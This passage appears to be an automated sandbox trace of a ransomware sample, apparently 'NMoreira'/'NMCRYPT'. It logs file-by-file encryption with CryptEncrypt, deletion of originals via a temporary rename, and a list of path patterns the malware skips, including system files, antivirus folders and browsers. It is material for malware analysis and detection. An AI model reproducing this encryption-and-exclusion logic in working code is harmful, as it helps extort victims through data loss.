lpOverlapped=0x0) returned 1 [0163.444] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.444] GetLastError () returned 0x0 [0163.444] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.444] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.444] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.444] GetLastError () returned 0x0 [0163.444] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.444] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.444] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.444] GetLastError () returned 0x0 [0163.444] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.444] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.444] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.444] GetLastError () returned 0x0 [0163.444] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.444] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.444] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.444] GetLastError () returned 0x0 [0163.444] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.444] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.444] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.445] GetLastError () returned 0x0 [0163.445] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.445] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.445] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.445] GetLastError () returned 0x0 [0163.445] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.445] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.445] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.445] GetLastError () returned 0x0 [0163.445] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.445] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.445] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.445] GetLastError () returned 0x0 [0163.445] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.445] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.445] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.445] GetLastError () returned 0x0 [0163.445] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.445] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.445] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.445] GetLastError () returned 0x0 [0163.445] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.445] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.445] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.446] GetLastError () returned 0x0 [0163.446] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.446] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.446] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.446] GetLastError () returned 0x0 [0163.446] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.446] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.446] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.446] GetLastError () returned 0x0 [0163.446] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.446] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.446] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.446] GetLastError () returned 0x0 [0163.446] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.446] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.446] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.446] GetLastError () returned 0x0 [0163.446] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.446] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.446] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.446] GetLastError () returned 0x0 [0163.446] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.446] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.446] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.446] GetLastError () returned 0x0 [0163.446] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.446] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.447] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.447] GetLastError () returned 0x0 [0163.447] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.447] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.447] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.447] GetLastError () returned 0x0 [0163.447] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.447] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x6, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x6, lpOverlapped=0x0) returned 1 [0163.447] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x6, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x10) returned 1 [0163.447] GetLastError () returned 0x0 [0163.447] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x10, lpOverlapped=0x0) returned 1 [0163.447] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0163.447] WriteFile (in: hFile=0x588, lpBuffer=0x2974d38*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0163.447] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg")) returned 0x20 [0163.447] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg", dwFileAttributes=0x20) returned 0 [0163.448] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 1 [0163.448] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg")) returned 0 [0163.448] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" [0163.448] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0163.448] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF1E1.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf1e1.tmp")) returned 0xf1e1 [0163.449] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF1E1.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf1e1.tmp"), dwFlags=0x1) returned 0 [0163.449] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF1E1.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf1e1.tmp")) returned 1 [0163.450] CryptDestroyKey (hKey=0x9ad478) returned 1 [0163.450] wcslen (_String="OK") returned 0x2 [0163.450] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.450] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.450] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0163.450] CryptDestroyHash (hHash=0x9ad278) returned 1 [0163.450] CryptReleaseContext (hProv=0x8e2f78, dwFlags=0x0) returned 1 [0163.450] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*NMCRYPT") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*Recovers your files.html") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*.exe") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*.dll") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*.lnk") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*.bat") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*.ini") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*.msi") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*.scf") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*pagefile.sys*") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*NTUSER.DAT*") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*AppData*") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*\\winrar\\*") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*\\Internet Explorer\\*") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*\\java\\*") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*\\TeamViewer\\*") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*\\windows\\*") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*\\ESET\\*") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*\\AVG\\*") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*\\AVIRA\\*") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*\\AVAST Software\\*") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*Atheros*") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*Realtek*") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*bootmgr*") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*boot*") returned 0 [0163.450] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*boot*") returned 0 [0163.451] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*CONFIG.SYS*") returned 0 [0163.451] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*IO.SYS*") returned 0 [0163.451] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*MSDOS.SYS*") returned 0 [0163.451] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*NTDETECT.COM*") returned 0 [0163.451] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*ntldr*") returned 0 [0163.451] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*chrome*") returned 0 [0163.451] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*opera*") returned 0 [0163.451] PathMatchSpecW (pszFile="grid_(cm).wmf", pszSpec="*firefox*") returned 0 [0163.451] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(cm).wmf", pszSpec="*") returned 1 [0163.451] strlen (_Str="NMoreira") returned 0x8 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 